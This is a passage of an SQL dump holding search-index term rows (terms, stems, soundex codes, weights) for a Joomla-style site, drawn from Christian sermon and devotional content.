(77380, '5 19-21', '5 19-21', 0, 1, 1.2333, '', 2, '*'),
(77395, '9 4', '9 4', 0, 1, 1.1, '', 2, '*'),
(77404, 'a decision', 'a decision', 0, 1, 1.3333, 'A325', 3, '*'),
(77409, 'a good', 'a good', 0, 1, 1.2, 'A230', 4, '*'),
(77421, 'accordance', 'accord', 0, 0, 0.6667, 'A26352', 3, '*'),
(77429, 'air', 'air', 0, 0, 0.2, 'A600', 2, '*'),
(77433, 'alive', 'aliv', 0, 0, 0.3333, 'A410', 4, '*'),
(77436, 'alive and', 'aliv and', 0, 1, 1.3, 'A4153', 2, '*'),
(77443, 'and also', 'and also', 0, 1, 1.2667, 'A5342', 3, '*'),
(77458, 'and obey', 'and obey', 0, 1, 1.2667, 'A531', 2, '*'),
(77476, 'any of', 'ani of', 0, 1, 1.2, 'A510', 2, '*'),
(77478, 'appearance', 'appear', 0, 0, 0.6667, 'A1652', 2, '*'),
(77484, 'are alive', 'ar alive', 0, 1, 1.3, 'A641', 3, '*'),
(77486, 'are alive and', 'ar alive and', 0, 1, 1.4333, 'A64153', 2, '*'),
(77492, 'are you', 'ar you', 0, 1, 1.2333, 'A600', 12, '*'),
(77498, 'at the expense', 'at the expense', 0, 1, 1.4667, 'A32152', 2, '*'),
(77507, 'be with', 'be with', 0, 1, 1.2333, 'B300', 2, '*'),
(77518, 'bless', 'bless', 0, 0, 0.3333, 'B420', 3, '*'),
(77519, 'bless you', 'bless you', 0, 1, 1.3, 'B420', 2, '*'),
(77522, 'but they', 'but they', 0, 1, 1.2667, 'B300', 7, '*'),
(77523, 'but they are', 'but they are', 0, 1, 1.4, 'B360', 3, '*'),
(77524, 'calendar', 'calendar', 0, 0, 0.5333, 'C4536', 2, '*'),
(77527, 'came to', 'came to', 0, 1, 1.2333, 'C530', 8, '*'),
(77534, 'caught', 'caught', 0, 0, 0.4, 'C300', 3, '*'),
(77544, 'children to', 'children to', 0, 1, 1.3667, 'C43653', 3, '*'),
(77550, 'christ in', 'christ in', 0, 1, 1.3, 'C6235', 3, '*'),
(77554, 'christ which', 'christ which', 0, 1, 1.4, 'C6232', 3, '*'),
(77573, 'considered', 'consid', 0, 0, 0.6667, 'C52363', 3, '*'),
(77583, 'could take', 'could take', 0, 1, 1.3333, 'C432', 2, '*'),
(77595, 'deceitfulness', 'deceit', 0, 0, 0.8667, 'D231452', 2, '*'),
(77596, 'deceitfulness of', 'deceit of', 0, 1, 1.5333, 'D2314521', 2, '*'),
(77597, 'deceitfulness of riches', 'deceit of riches', 0, 1, 1.7667, 'D231452162', 2, '*'),
(77600, 'defilement', 'defil', 0, 0, 0.6667, 'D1453', 2, '*'),
(77623, 'directly', 'directli', 0, 0, 0.5333, 'D6234', 5, '*'),
(77626, 'disobedience', 'disobedi', 0, 0, 0.8, 'D21352', 7, '*'),
(77627, 'disobedience to', 'disobedi to', 0, 1, 1.5, 'D213523', 4, '*'),
(77631, 'doctrines', 'doctrin', 0, 0, 0.6, 'D23652', 2, '*'),
(77647, 'elisha', 'elisha', 0, 0, 0.4, 'E420', 3, '*'),
(77650, 'end time', 'end time', 0, 1, 1.2667, 'E535', 2, '*'),
(77654, 'eph', 'eph', 0, 0, 0.2, 'E100', 3, '*'),
(77660, 'establishing', 'establish', 0, 0, 0.8, 'E2314252', 2, '*'),
(77679, 'expense', 'expens', 0, 0, 0.4667, 'E2152', 2, '*'),
(77680, 'expense of', 'expens of', 0, 1, 1.3333, 'E21521', 2, '*'),
(77682, 'eye', 'ey', 0, 0, 0.2, 'E000', 2, '*'),
(77690, 'fault', 'fault', 0, 0, 0.3333, 'F430', 2, '*'),
(77696, 'fire', 'fire', 0, 0, 0.2667, 'F600', 5, '*'),
(77703, 'flesh', 'flesh', 0, 0, 0.3333, 'F420', 9, '*'),
(77706, 'flesh that', 'flesh that', 0, 1, 1.3333, 'F423', 2, '*'),
(77715, 'found', 'found', 0, 0, 0.3333, 'F530', 9, '*'),
(77716, 'found in', 'found in', 0, 1, 1.2667, 'F535', 3, '*'),
(77735, 'god expects', 'god expects', 0, 1, 1.3667, 'G321232', 2, '*'),
(77739, 'god i', 'god i', 0, 1, 1.1667, 'G300', 3, '*'),
(77741, 'god it', 'god it', 0, 1, 1.2, 'G300', 4, '*'),
(77742, 'god it is', 'god it is', 0, 1, 1.3, 'G320', 2, '*'),
(77743, 'god rev', 'god rev', 0, 1, 1.2333, 'G361', 2, '*'),
(77744, 'god rev 3', 'god rev 3', 0, 1, 1.3, 'G361', 2, '*'),
(77751, 'going with', 'go with', 0, 1, 1.3333, 'G523', 2, '*'),
(77760, 'got', 'got', 0, 0, 0.2, 'G300', 5, '*'),
(77761, 'got it', 'got it', 0, 1, 1.2, 'G300', 2, '*'),
(77772, 'have a good', 'have a good', 0, 1, 1.3667, 'H123', 2, '*'),
(77773, 'have an', 'have an', 0, 1, 1.2333, 'H150', 3, '*'),
(77775, 'have one', 'have one', 0, 1, 1.2667, 'H150', 3, '*'),
(77777, 'having a', 'have a', 0, 1, 1.2667, 'H152', 2, '*'),
(77781, 'heed', 'heed', 0, 0, 0.2667, 'H300', 7, '*'),
(77782, 'heed to', 'heed to', 0, 1, 1.2333, 'H300', 7, '*'),
(77784, 'hence', 'henc', 0, 0, 0.3333, 'H520', 3, '*'),
(77790, 'him with', 'him with', 0, 1, 1.2667, 'H530', 3, '*'),
(77803, 'honour', 'honour', 0, 0, 0.4, 'H560', 4, '*'),
(77815, 'i see', 'i see', 0, 1, 1.1667, 'I200', 3, '*'),
(77820, 'in 1', 'in 1', 0, 1, 1.1333, 'I500', 2, '*'),
(77822, 'in 2', 'in 2', 0, 1, 1.1333, 'I500', 2, '*'),
(77824, 'in accordance', 'in accordance', 0, 1, 1.4333, 'I526352', 3, '*'),
(77830, 'in the lord', 'in the lord', 0, 1, 1.3667, 'I53463', 3, '*'),
(77832, 'in which', 'in which', 0, 1, 1.2667, 'I520', 2, '*'),
(77850, 'is found', 'is found', 0, 1, 1.2667, 'I2153', 2, '*'),
(77856, 'is that it', 'is that it', 0, 1, 1.3333, 'I230', 2, '*'),
(77866, 'it or', 'it or', 0, 1, 1.1667, 'I360', 3, '*'),
(77870, 'jesus came to', 'jesu came to', 0, 1, 1.4333, 'J530', 2, '*'),
(77871, 'jesus christ which', 'jesu christ which', 0, 1, 1.6, 'J6232', 2, '*'),
(77878, 'jude', 'jude', 0, 0, 0.2667, 'J300', 2, '*'),
(77882, 'kingdom of', 'kingdom of', 0, 1, 1.3333, 'K52351', 4, '*'),
(77883, 'kingdom of god', 'kingdom of god', 0, 1, 1.4667, 'K5235123', 2, '*'),
(77885, 'kings', 'king', 0, 0, 0.3333, 'K520', 2, '*'),
(77897, 'lord in', 'lord in', 0, 1, 1.2333, 'L635', 3, '*'),
(77907, 'mat', 'mat', 0, 0, 0.2, 'M300', 4, '*'),
(77908, 'mat 24', 'mat 24', 0, 1, 1.2, 'M300', 2, '*'),
(77913, 'matt.24', 'matt.24', 0, 0, 0.4667, 'M300', 2, '*'),
(77916, 'matthew', 'matthew', 0, 0, 0.4667, 'M300', 8, '*'),
(77917, 'matthew 13', 'matthew 13', 0, 1, 1.3333, 'M300', 2, '*'),
(77924, 'meet', 'meet', 0, 0, 0.2667, 'M300', 6, '*'),
(77927, 'meeting', 'meet', 0, 0, 0.4667, 'M352', 2, '*'),
(77948, 'obey', 'obei', 0, 0, 0.2667, 'O100', 10, '*'),
(77961, 'of flesh', 'of flesh', 0, 1, 1.2667, 'O142', 2, '*'),
(77966, 'of god it', 'of god it', 0, 1, 1.3, 'O123', 2, '*'),
(77971, 'of heaven', 'of heaven', 0, 1, 1.3, 'O150', 7, '*'),
(77977, 'of riches', 'of riches', 0, 1, 1.3, 'O162', 2, '*'),
(77983, 'of satan', 'of satan', 0, 1, 1.2667, 'O1235', 2, '*'),
(77987, 'of the flesh', 'of the flesh', 0, 1, 1.4, 'O13142', 2, '*'),
(77988, 'of these', 'of these', 0, 1, 1.2667, 'O132', 5, '*'),
(77990, 'of those', 'of those', 0, 1, 1.2667, 'O132', 3, '*'),
(77995, 'on earth', 'on earth', 0, 1, 1.2667, 'O563', 6, '*'),
(77997, 'on god\'s', 'on god', 0, 1, 1.2667, 'O5232', 2, '*'),
(77999, 'on the earth', 'on the earth', 0, 1, 1.4, 'O5363', 7, '*'),
(78015, 'parents', 'parent', 0, 0, 0.4667, 'P6532', 2, '*'),
(78024, 'pharisees', 'pharise', 0, 0, 0.6, 'P620', 2, '*'),
(78045, 'rapture', 'raptur', 0, 0, 0.4667, 'R136', 2, '*'),
(78052, 'rapture of', 'raptur of', 0, 1, 1.3333, 'R1361', 2, '*'),
(78054, 'rapture of the', 'raptur of the', 0, 1, 1.4667, 'R13613', 2, '*'),
(78057, 'rebellious', 'rebelli', 0, 0, 0.6667, 'R142', 2, '*'),
(78060, 'refers', 'refer', 0, 0, 0.4, 'R162', 2, '*'),
(78061, 'refers to', 'refer to', 0, 1, 1.3, 'R1623', 2, '*'),
(78062, 'refers to the', 'refer to the', 0, 1, 1.4333, 'R1623', 2, '*'),
(78067, 'remaining', 'remain', 0, 0, 0.6, 'R520', 2, '*'),
(78075, 'rev 3', 'rev 3', 0, 1, 1.1667, 'R100', 2, '*'),
(78085, 'riches', 'rich', 0, 0, 0.4, 'R200', 2, '*'),
(78090, 'sacred', 'sacr', 0, 0, 0.4, 'S630', 3, '*'),
(78106, 'satan', 'satan', 0, 0, 0.3333, 'S350', 3, '*'),
(78107, 'satan and', 'satan and', 0, 1, 1.3, 'S353', 2, '*'),
(78122, 'shall be', 'shall be', 0, 1, 1.2667, 'S410', 9, '*'),
(78124, 'shall not', 'shall not', 0, 1, 1.3, 'S453', 6, '*'),
(78138, 'spirits the', 'spirit the', 0, 1, 1.3667, 'S16323', 2, '*'),
(78140, 'spiritually', 'spiritu', 0, 0, 0.7333, 'S1634', 4, '*'),
(78149, 'story', 'stori', 0, 0, 0.3333, 'S360', 2, '*'),
(78150, 'story of', 'stori of', 0, 1, 1.2667, 'S361', 2, '*'),
(78159, 'take a decision', 'take a decision', 0, 1, 1.5, 'T2325', 2, '*'),
(78165, 'term', 'term', 0, 0, 0.2667, 'T650', 2, '*'),
(78177, 'that it is', 'that it is', 0, 1, 1.3333, 'T200', 2, '*'),
(78181, 'that violates', 'that violates', 0, 1, 1.4333, 'T1432', 2, '*'),
(78183, 'the above', 'the above', 0, 1, 1.3, 'T100', 2, '*'),
(78185, 'the act', 'the act', 0, 1, 1.2333, 'T230', 2, '*'),
(78187, 'the air', 'the air', 0, 1, 1.2333, 'T600', 2, '*'),
(78189, 'the believers', 'the believers', 0, 1, 1.4333, 'T14162', 3, '*'),
(78199, 'the earth', 'the earth', 0, 1, 1.3, 'T630', 9, '*'),
(78201, 'the expense', 'the expense', 0, 1, 1.3667, 'T2152', 2, '*'),
(78202, 'the expense of', 'the expense of', 0, 1, 1.4667, 'T21521', 2, '*'),
(78203, 'the flesh', 'the flesh', 0, 1, 1.3, 'T142', 5, '*'),
(78204, 'the flesh that', 'the flesh that', 0, 1, 1.4667, 'T1423', 2, '*'),
(78205, 'the good', 'the good', 0, 1, 1.2667, 'T230', 6, '*'),
(78207, 'the kingdom of', 'the kingdom of', 0, 1, 1.4667, 'T252351', 3, '*'),
(78209, 'the lord in', 'the lord in', 0, 1, 1.3667, 'T4635', 3, '*'),
(78216, 'the rapture', 'the rapture', 0, 1, 1.3667, 'T6136', 2, '*'),
(78219, 'the rapture of', 'the rapture of', 0, 1, 1.4667, 'T61361', 2, '*'),
(78221, 'the things of', 'the things of', 0, 1, 1.4333, 'T521', 3, '*'),
(78228, 'their parents', 'their parents', 0, 1, 1.4333, 'T616532', 2, '*'),
(78230, 'them in', 'them in', 0, 1, 1.2333, 'T500', 5, '*'),
(78231, 'them in the', 'them in the', 0, 1, 1.3667, 'T530', 2, '*'),
(78253, 'they are', 'thei are', 0, 1, 1.2667, 'T600', 14, '*'),
(78262, 'things of god', 'thing of god', 0, 1, 1.4333, 'T52123', 2, '*'),
(78264, 'this refers', 'thi refers', 0, 1, 1.3667, 'T26162', 2, '*'),
(78265, 'this refers to', 'thi refers to', 0, 1, 1.4667, 'T261623', 2, '*'),
(78266, 'those that', 'those that', 0, 1, 1.3333, 'T230', 7, '*'),
(78275, 'timothy', 'timothi', 0, 0, 0.4667, 'T530', 2, '*'),
(78284, 'to obtain', 'to obtain', 0, 1, 1.3, 'T135', 2, '*'),
(78288, 'to put', 'to put', 0, 1, 1.2, 'T130', 2, '*'),
(78297, 'today to', 'todai to', 0, 1, 1.2667, 'T000', 3, '*'),
(78299, 'together', 'togeth', 0, 0, 0.5333, 'T236', 2, '*'),
(78320, 'very', 'veri', 0, 0, 0.2667, 'V600', 15, '*'),
(78323, 'violates', 'violat', 0, 0, 0.5333, 'V432', 2, '*'),
(78331, 'we have', 'we have', 0, 1, 1.2333, 'W100', 3, '*'),
(78337, 'wealth', 'wealth', 0, 0, 0.4, 'W430', 3, '*'),
(78340, 'what god', 'what god', 0, 1, 1.2667, 'W323', 10, '*'),
(78343, 'which are', 'which are', 0, 1, 1.3, 'W260', 2, '*'),
(78364, 'works of', 'work of', 0, 1, 1.2667, 'W621', 3, '*'),
(78366, 'works that', 'work that', 0, 1, 1.3333, 'W623', 2, '*'),
(81381, '18', '18', 0, 0, 0.2, '', 12, '*'),
(82075, 'is what god', 'is what god', 0, 1, 1.3667, 'I2323', 3, '*'),
(82160, 'looking', 'look', 0, 0, 0.4667, 'L252', 7, '*'),
(82357, 'result', 'result', 0, 0, 0.4, 'R243', 5, '*'),
(82413, 'show', 'show', 0, 0, 0.2667, 'S000', 6, '*'),
(82474, 'that there', 'that there', 0, 1, 1.3333, 'T600', 5, '*'),
(82475, 'that there is', 'that there is', 0, 1, 1.4333, 'T620', 4, '*'),
(82631, 'understanding the', 'understand the', 0, 1, 1.5667, 'U5362353523', 3, '*'),
(82746, 'you will be', 'you will be', 0, 1, 1.3667, 'Y410', 9, '*'),
(84403, '1 the', '1 the', 0, 1, 1.1667, 'T000', 3, '*'),
(84419, 'a banker', 'a banker', 0, 1, 1.2667, 'A1526', 2, '*'),
(84421, 'a business man', 'a business man', 0, 1, 1.4667, 'A12525', 2, '*'),
(84432, 'a man is', 'a man is', 0, 1, 1.2667, 'A520', 4, '*'),
(84433, 'a people', 'a people', 0, 1, 1.2667, 'A140', 2, '*'),
(84445, 'affects', 'affect', 0, 0, 0.4667, 'A1232', 3, '*'),
(84451, 'against you', 'against you', 0, 1, 1.3667, 'A2523', 2, '*'),
(84460, 'almighty', 'almighti', 0, 0, 0.5333, 'A4523', 2, '*'),
(84473, 'and god', 'and god', 0, 1, 1.2333, 'A5323', 9, '*'),
(84475, 'and god will', 'and god will', 0, 1, 1.4, 'A53234', 2, '*'),
(84476, 'and it will', 'and it will', 0, 1, 1.3667, 'A534', 4, '*'),
(84486, 'are blessed', 'ar blessed', 0, 1, 1.3667, 'A61423', 2, '*'),
(84489, 'are going', 'ar going', 0, 1, 1.3, 'A6252', 9, '*'),
(84493, 'are only', 'ar only', 0, 1, 1.2667, 'A654', 4, '*'),
(84502, 'balaam', 'balaam', 0, 0, 0.4, 'B450', 2, '*'),
(84505, 'banker', 'banker', 0, 0, 0.4, 'B526', 2, '*'),
(84518, 'beloved take', 'belov take', 0, 1, 1.4, 'B4132', 2, '*'),
(84524, 'beyond the', 'beyond the', 0, 1, 1.3333, 'B530', 3, '*'),
(84546, 'blood of', 'blood of', 0, 1, 1.2667, 'B431', 2, '*'),
(84547, 'blood of jesus', 'blood of jesus', 0, 1, 1.4667, 'B4312', 2, '*'),
(84548, 'business man', 'busi man', 0, 1, 1.4, 'B2525', 2, '*'),
(84593, 'cursed', 'curs', 0, 0, 0.4, 'C623', 3, '*'),
(84600, 'dearly beloved take', 'dearli beloved take', 0, 1, 1.6333, 'D6414132', 2, '*'),
(84608, 'effort', 'effort', 0, 0, 0.4, 'E163', 3, '*'),
(84623, 'failed', 'fail', 0, 0, 0.4, 'F430', 5, '*'),
(84624, 'failed because', 'fail because', 0, 1, 1.4667, 'F4312', 2, '*'),
(84632, 'following things', 'follow things', 0, 1, 1.5333, 'F452352', 2, '*'),
(84640, 'forward', 'forward', 0, 0, 0.4667, 'F630', 4, '*'),
(84646, 'god 3', 'god 3', 0, 1, 1.1667, 'G300', 3, '*'),
(84652, 'god he', 'god he', 0, 1, 1.2, 'G300', 5, '*'),
(84657, 'god therefore', 'god therefore', 0, 1, 1.4333, 'G3616', 2, '*'),
(84659, 'god you must', 'god you must', 0, 1, 1.4, 'G3523', 2, '*'),
(84670, 'have taken', 'have taken', 0, 1, 1.3333, 'H1325', 3, '*'),
(84671, 'have taken their', 'have taken their', 0, 1, 1.5333, 'H132536', 2, '*'),
(84674, 'he failed', 'he failed', 0, 1, 1.3, 'H143', 2, '*'),
(84693, 'influence', 'influenc', 0, 0, 0.6, 'I51452', 5, '*'),
(84704, 'is god', 'is god', 0, 1, 1.2, 'I230', 4, '*'),
(84708, 'is no', 'is no', 0, 1, 1.1667, 'I250', 7, '*'),
(84711, 'is something', 'is something', 0, 1, 1.4, 'I25352', 4, '*'),
(84719, 'it can be', 'it can be', 0, 1, 1.3, 'I3251', 2, '*'),
(84742, 'lesser', 'lesser', 0, 0, 0.4, 'L260', 2, '*'),
(84743, 'lesser than', 'lesser than', 0, 1, 1.3667, 'L2635', 2, '*'),
(84745, 'lesser than what', 'lesser than what', 0, 1, 1.5333, 'L26353', 2, '*'),
(84746, 'life as', 'life as', 0, 1, 1.2333, 'L120', 3, '*'),
(84756, 'lord if', 'lord if', 0, 1, 1.2333, 'L631', 2, '*'),
(84764, 'men have', 'men have', 0, 1, 1.2667, 'M100', 2, '*'),
(84766, 'mercies', 'merci', 0, 0, 0.4667, 'M620', 2, '*'),
(84773, 'must take', 'must take', 0, 1, 1.3, 'M232', 5, '*'),
(84775, 'must understand', 'must understand', 0, 1, 1.5, 'M235362353', 4, '*'),
(84776, 'must understand that', 'must understand that', 0, 1, 1.6667, 'M235362353', 3, '*'),
(84777, 'neither', 'neither', 0, 0, 0.4667, 'N360', 4, '*'),
(84784, 'note of', 'note of', 0, 1, 1.2333, 'N310', 3, '*'),
(84786, 'of god you', 'of god you', 0, 1, 1.3333, 'O123', 2, '*'),
(84793, 'on your', 'on your', 0, 1, 1.2333, 'O560', 7, '*'),
(84794, 'on your life', 'on your life', 0, 1, 1.4, 'O5641', 3, '*'),
(84795, 'only two', 'onli two', 0, 1, 1.2667, 'O543', 2, '*'),
(84809, 'over your', 'over your', 0, 1, 1.3, 'O160', 7, '*'),
(84810, 'over your life', 'over your life', 0, 1, 1.4667, 'O1641', 5, '*'),
(84813, 'people\'s', 'peopl', 0, 0, 0.5333, 'P420', 3, '*'),
(84817, 'picks', 'pick', 0, 0, 0.3333, 'P200', 2, '*'),
(84823, 'positive', 'posit', 0, 0, 0.5333, 'P231', 4, '*'),
(84826, 'problem', 'problem', 0, 0, 0.4667, 'P6145', 9, '*'),
(84844, 'response', 'respons', 0, 0, 0.5333, 'R2152', 2, '*'),
(84852, 'simply', 'simpli', 0, 0, 0.4, 'S514', 2, '*'),
(84853, 'simply means', 'simpli means', 0, 1, 1.4, 'S51452', 2, '*'),
(84859, 'something that', 'someth that', 0, 1, 1.4667, 'S53523', 3, '*'),
(84876, 'supernatural', 'supernatur', 0, 0, 0.8, 'S165364', 6, '*'),
(84887, 'take along', 'take along', 0, 1, 1.3333, 'T2452', 2, '*'),
(84889, 'take note', 'take note', 0, 1, 1.3, 'T253', 2, '*'),
(84890, 'take note of', 'take note of', 0, 1, 1.4, 'T2531', 2, '*'),
(84891, 'taken', 'taken', 0, 0, 0.3333, 'T250', 5, '*'),
(84892, 'taken their', 'taken their', 0, 1, 1.3667, 'T2536', 2, '*'),
(84896, 'than what', 'than what', 0, 1, 1.3, 'T530', 2, '*'),
(84909, 'the blessing', 'the blessing', 0, 1, 1.4, 'T14252', 2, '*'),
(84915, 'the blood', 'the blood', 0, 1, 1.3, 'T143', 2, '*'),
(84916, 'the blood of', 'the blood of', 0, 1, 1.4, 'T1431', 2, '*'),
(84917, 'the curse', 'the curse', 0, 1, 1.3, 'T262', 2, '*'),
(84920, 'the following things', 'the following things', 0, 1, 1.6667, 'T1452352', 2, '*'),
(84921, 'the lord if', 'the lord if', 0, 1, 1.3667, 'T4631', 2, '*'),
(84922, 'the problem', 'the problem', 0, 1, 1.3667, 'T16145', 4, '*'),
(84939, 'there is no', 'there is no', 0, 1, 1.3667, 'T625', 6, '*'),
(84940, 'there is something', 'there is something', 0, 1, 1.6, 'T625352', 2, '*'),
(84953, 'to fight', 'to fight', 0, 1, 1.2667, 'T123', 2, '*'),
(84967, 'under', 'under', 0, 0, 0.3333, 'U536', 7, '*'),
(84968, 'under the', 'under the', 0, 1, 1.3, 'U5363', 5, '*'),
(84972, 'upward', 'upward', 0, 0, 0.4, 'U163', 3, '*'),
(84975, 'us to', 'us to', 0, 1, 1.1667, 'U230', 8, '*'),
(84984, 'when a', 'when a', 0, 1, 1.2, 'W500', 4, '*'),
(84985, 'when a man', 'when a man', 0, 1, 1.3333, 'W500', 3, '*'),
(84995, 'words but', 'word but', 0, 1, 1.3, 'W63213', 3, '*'),
(85002, 'work is', 'work is', 0, 1, 1.2333, 'W620', 2, '*'),
(85020, 'you are blessed', 'you are blessed', 0, 1, 1.5, 'Y61423', 2, '*'),
(85021, 'you are going', 'you are going', 0, 1, 1.4333, 'Y6252', 6, '*'),
(85022, 'you every', 'you every', 0, 1, 1.3, 'Y160', 3, '*'),
(85024, 'you he', 'you he', 0, 1, 1.2, 'Y000', 4, '*'),
(85027, 'you must take', 'you must take', 0, 1, 1.4333, 'Y5232', 3, '*'),
(85028, 'you must understand', 'you must understand', 0, 1, 1.6333, 'Y5235362353', 3, '*'),
(85031, 'you put', 'you put', 0, 1, 1.2333, 'Y130', 2, '*'),
(85044, 'your life as', 'your life as', 0, 1, 1.4, 'Y6412', 3, '*'),
(85045, 'your life that', 'your life that', 0, 1, 1.4667, 'Y6413', 5, '*'),
(85049, 'your work', 'your work', 0, 1, 1.3, 'Y620', 2, '*'),
(90643, 'centre', 'centr', 0, 0, 0.4, 'C536', 11, '*'),
(90666, 'declare', 'declar', 0, 0, 0.4667, 'D246', 8, '*'),
(90682, 'dream centre', 'dream centre', 0, 1, 1.4, 'D652536', 11, '*'),
(90714, 'from people', 'from people', 0, 1, 1.3667, 'F6514', 2, '*'),
(90723, 'god to work', 'god to work', 0, 1, 1.3667, 'G362', 2, '*'),
(90774, 'in church', 'in church', 0, 1, 1.3, 'I5262', 6, '*'),
(90925, 'pastors', 'pastor', 0, 0, 0.4667, 'P2362', 2, '*'),
(90928, 'people are', 'peopl are', 0, 1, 1.3333, 'P460', 4, '*'),
(91023, 'the dream', 'the dream', 0, 1, 1.3, 'T650', 9, '*'),
(91024, 'the dream centre', 'the dream centre', 0, 1, 1.5333, 'T652536', 9, '*'),
(91072, 'to say', 'to say', 0, 1, 1.2, 'T200', 2, '*'),
(91076, 'to work', 'to work', 0, 1, 1.2333, 'T620', 6, '*'),
(91104, 'watching', 'watch', 0, 0, 0.5333, 'W3252', 4, '*'),
(91156, 'you find', 'you find', 0, 1, 1.2667, 'Y153', 6, '*'),
(91573, '1-3', '1-3', 0, 0, 0.3, '', 2, '*'),
(91585, '10-12', '10-12', 0, 0, 0.5, '', 3, '*'),
(91684, 'a christian should', 'a christian should', 0, 1, 1.6, 'A26235243', 2, '*'),
(91707, 'ability', 'abil', 0, 0, 0.4667, 'A143', 11, '*'),
(91717, 'according', 'accord', 0, 0, 0.6, 'A26352', 7, '*'),
(91718, 'according to', 'accord to', 0, 1, 1.4, 'A263523', 7, '*'),
(91719, 'according to the', 'accord to the', 0, 1, 1.5333, 'A263523', 2, '*'),
(91751, 'an assignment', 'an assignment', 0, 1, 1.4333, 'A5253', 3, '*'),
(91759, 'and called', 'and called', 0, 1, 1.3333, 'A53243', 3, '*'),
(91761, 'and in', 'and in', 0, 1, 1.2, 'A535', 9, '*'),
(91769, 'and said', 'and said', 0, 1, 1.2667, 'A5323', 4, '*'),
(91777, 'anointing for', 'anoint for', 0, 1, 1.4333, 'A535216', 2, '*'),
(91788, 'approach', 'approach', 0, 0, 0.5333, 'A162', 2, '*'),
(91794, 'are few', 'ar few', 0, 1, 1.2333, 'A610', 2, '*'),
(91798, 'are what', 'ar what', 0, 1, 1.2667, 'A630', 2, '*'),
(91810, 'assignment', 'assign', 0, 0, 0.6667, 'A253', 10, '*'),
(91813, 'assignment you', 'assign you', 0, 1, 1.4667, 'A253', 2, '*'),
(91814, 'assignment you are', 'assign you are', 0, 1, 1.6, 'A2536', 2, '*'),
(91823, 'at an', 'at an', 0, 1, 1.1667, 'A350', 2, '*'),
(91825, 'avoid', 'avoid', 0, 0, 0.3333, 'A130', 6, '*'),
(91826, 'avoid the', 'avoid the', 0, 1, 1.3, 'A130', 2, '*'),
(91828, 'battle', 'battl', 0, 0, 0.4, 'B340', 4, '*'),
(91831, 'be a christian', 'be a christian', 0, 1, 1.4667, 'B26235', 4, '*'),
(91839, 'be done', 'be done', 0, 1, 1.2333, 'B350', 2, '*'),
(91841, 'be sure that', 'be sure that', 0, 1, 1.4, 'B263', 2, '*'),
(91844, 'because he', 'becaus he', 0, 1, 1.3333, 'B200', 6, '*'),
(91845, 'because he had', 'becaus he had', 0, 1, 1.4667, 'B230', 2, '*'),
(91846, 'becoming', 'becom', 0, 0, 0.5333, 'B252', 3, '*'),
(91855, 'body of', 'bodi of', 0, 1, 1.2333, 'B310', 2, '*'),
(91866, 'bring forth', 'bring forth', 0, 1, 1.3667, 'B652163', 3, '*'),
(91870, 'bring more', 'bring more', 0, 1, 1.3333, 'B65256', 2, '*'),
(91872, 'brought', 'brought', 0, 0, 0.4667, 'B623', 4, '*'),
(91873, 'brought forth', 'brought forth', 0, 1, 1.4333, 'B623163', 2, '*'),
(91875, 'builds', 'build', 0, 0, 0.4, 'B432', 2, '*'),
(91891, 'but without', 'but without', 0, 1, 1.3667, 'B300', 2, '*'),
(91893, 'but you will', 'but you will', 0, 1, 1.4, 'B340', 2, '*'),
(91904, 'can give', 'can give', 0, 1, 1.2667, 'C521', 2, '*'),
(91908, 'capacity', 'capac', 0, 0, 0.5333, 'C123', 8, '*'),
(91911, 'care', 'care', 0, 0, 0.2667, 'C600', 4, '*'),
(91927, 'christian in', 'christian in', 0, 1, 1.4, 'C6235', 4, '*'),
(91929, 'christian should', 'christian should', 0, 1, 1.5333, 'C6235243', 3, '*'),
(91935, 'church membership', 'church membership', 0, 1, 1.5667, 'C6251621', 2, '*'),
(91944, 'coming to', 'come to', 0, 1, 1.3, 'C523', 2, '*'),
(91971, 'david had', 'david had', 0, 1, 1.3, 'D130', 2, '*'),
(91973, 'david it', 'david it', 0, 1, 1.2667, 'D130', 2, '*'),
(91977, 'david was', 'david was', 0, 1, 1.3, 'D132', 3, '*'),
(91982, 'day that', 'dai that', 0, 1, 1.2667, 'D000', 2, '*'),
(91984, 'depend', 'depend', 0, 0, 0.4, 'D153', 3, '*'),
(91985, 'depend on', 'depend on', 0, 1, 1.3, 'D1535', 3, '*'),
(91987, 'destiny', 'destini', 0, 0, 0.4667, 'D235', 18, '*'),
(91990, 'did not', 'did not', 0, 1, 1.2333, 'D530', 5, '*'),
(91995, 'disappoint', 'disappoint', 0, 0, 0.6667, 'D2153', 3, '*'),
(92001, 'divine intervention', 'divin intervention', 0, 1, 1.6333, 'D15361535', 3, '*'),
(92005, 'does not want', 'doe not want', 0, 1, 1.4333, 'D25353', 2, '*'),
(92006, 'doing something', 'do something', 0, 1, 1.5, 'D525352', 2, '*'),
(92015, 'done in', 'done in', 0, 1, 1.2333, 'D500', 2, '*'),
(92025, 'effective', 'effect', 0, 0, 0.6, 'E1231', 5, '*'),
(92040, 'evangelism', 'evangel', 0, 0, 0.6667, 'E152425', 2, '*'),
(92055, 'faithfulness', 'faith', 0, 0, 0.8, 'F31452', 3, '*'),
(92061, 'far', 'far', 0, 0, 0.2, 'F600', 5, '*'),
(92079, 'few', 'few', 0, 0, 0.2, 'F000', 4, '*'),
(92082, 'fig', 'fig', 0, 0, 0.2, 'F200', 2, '*'),
(92089, 'follows', 'follow', 0, 0, 0.4667, 'F420', 2, '*'),
(92096, 'for david', 'for david', 0, 1, 1.3, 'F6313', 2, '*'),
(92100, 'for it', 'for it', 0, 1, 1.2, 'F630', 2, '*'),
(92140, 'fruitful', 'fruit', 0, 0, 0.5333, 'F6314', 2, '*'),
(92152, 'gal', 'gal', 0, 0, 0.2, 'G400', 3, '*'),
(92153, 'gal 5', 'gal 5', 0, 1, 1.1667, 'G400', 2, '*'),
(92155, 'gather', 'gather', 0, 0, 0.4, 'G360', 2, '*'),
(92160, 'genesis', 'genesi', 0, 0, 0.4667, 'G520', 3, '*'),
(92167, 'glory of the', 'glori of the', 0, 1, 1.4, 'G4613', 3, '*'),
(92168, 'go for', 'go for', 0, 1, 1.2, 'G160', 3, '*'),
(92183, 'god was', 'god was', 0, 1, 1.2333, 'G320', 5, '*'),
(92188, 'grace', 'grace', 0, 0, 0.3333, 'G620', 3, '*'),
(92201, 'had to', 'had to', 0, 1, 1.2, 'H300', 5, '*'),
(92211, 'have nothing', 'have nothing', 0, 1, 1.4, 'H15352', 2, '*'),
(92212, 'have nothing to', 'have nothing to', 0, 1, 1.5, 'H153523', 2, '*'),
(92218, 'he does', 'he does', 0, 1, 1.2333, 'H320', 3, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
